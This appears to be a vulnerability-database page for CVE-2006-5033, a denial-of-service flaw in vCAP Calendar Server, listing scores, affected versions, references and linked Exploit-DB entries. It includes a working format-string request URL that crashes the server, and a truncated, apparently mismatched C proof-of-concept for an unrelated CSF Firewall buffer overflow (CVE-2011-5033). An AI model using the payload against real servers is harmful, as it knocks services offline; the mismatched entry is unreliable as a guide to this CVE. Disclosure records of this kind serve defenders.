CVE-2006-5033
Published 2006-09-27
Priority P4 · 21 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 3.55% (87.9th percentile)
Unspecified vulnerability in StoresAndCalendarsList.cgi in Paul Smith Computer Services vCAP 1.9.0 Beta and earlier allows remote attackers to cause a denial of service via the session parameter, possibly related to format string specifiers or malformed URL encoding.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| paul_smith_computer_services | vcap | <= 1.9.0_beta | — |
No detection rules found.
Exploit-DB
CSF Firewall - Buffer Overflow (PoC)
exploitdb·2011-12-09
CVE-2011-5033 CSF Firewall - Buffer Overflow (PoC)
---
/*
############################################################################
# Exploit Title: CSF Firewall Buffer overflow p0c
# DownLoaD : http://www.configserver.com/free/csf.tgz
# Date: 2011-12-09
# Author: FoX HaCkEr
# site : www.sec4ever.com
# MaiL : [email protected]
# Tested on: CentOS3/4
############################################################################
FiLe : CSF.c
*/
/*
* Copyright 2006-2011, Way to the Web Limited
* URL: http://www.configserver.com
* Email: [email protected]
*/
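#include <stdio.h>      /* FILE, fopen */
#include <sys/types.h>  /* uid_t */
#include <pwd.h>        /* struct passwd, getpwuid */
#include <unistd.h>     /* getuid */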
main ()
{
FILE *adminFile;
uid_t ruid;
char name[100];
struct passwd *pw;
int admin = 0;
ruid = getuid();
pw = getpwuid(ruid);
adminFile=fopen ("/usr/local/directadmin/data/admin/admin.list","r");
wh
Exploit-DB
Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service
exploitdb·2006-09-12
CVE-2006-5033 Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/19959/info
vCAP Calendar Server is prone to a remote denial-of-service vulnerability. This issue is due to a design error.
An attacker can exploit this issue to crash the application, effectively denying service.
vCAP Calendar Server 1.9.0 Beta and prior versions are vulnerable to this issue.
http://www.example.com:6100/StoresAndCalendarsList.cgi?session=%d%d%d%d%d
No writeups or analysis indexed.
References:
http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0187.html
http://secunia.com/advisories/21862
http://securitytracker.com/id?1016822
http://www.morx.org/vcap.txt
http://www.osvdb.org/28807
http://www.securityfocus.com/bid/19959
http://www.vupen.com/english/advisories/2006/3569
https://exchange.xforce.ibmcloud.com/vulnerabilities/28872
Published: 2006-09-27